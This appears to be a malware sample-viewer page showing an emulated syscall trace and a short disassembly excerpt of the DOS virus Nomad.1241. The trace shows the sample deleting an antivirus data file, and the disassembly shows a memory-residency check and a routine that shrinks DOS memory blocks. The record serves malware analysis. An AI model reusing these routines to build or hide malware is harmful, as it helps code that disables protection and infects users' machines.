Sample viewer

vx.netlux.org/Virus.DOS.Nomad.1241

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:30:26.098257404Z 65 PC: 12d64 | Delete file (Filename = 'anti-vir.dat')
2018-12-17T22:30:26.105180987Z 44 PC: 12a67 | Get time 0x12a67: cmp dl, 6
0x12a6a: ja 0x12a74
0x12a6c: mov ah, 9
0x12a6e: lea dx, word ptr [bp + 0x375]
0x12a72: int 0x21
0x12a74: push 0x6660
0x12a77: pop ax
0x12a78: int 0x21
0x12a7a: cmp bx, 0x5449
0x12a7e: je 0x12adf
0x12a80: pop ds
0x12a81: push ds
0x12a82: mov bx, ds
0x12a84: dec bx
0x12a85: mov ds, bx
0x12a87: sub word ptr [3], 0x4f
0x12a8c: sub word ptr [0x12], 0x4f
0x12a91: mov bx, word ptr [0x12]
0x12a95: mov ds, bx
0x12a97: inc bx
2018-12-17T22:30:26.108508478Z 102 PC: 12a7a | Get or set code page
2018-12-17T22:30:26.110746834Z 76 PC: 12f1e | Terminate with return code (Return code = '0')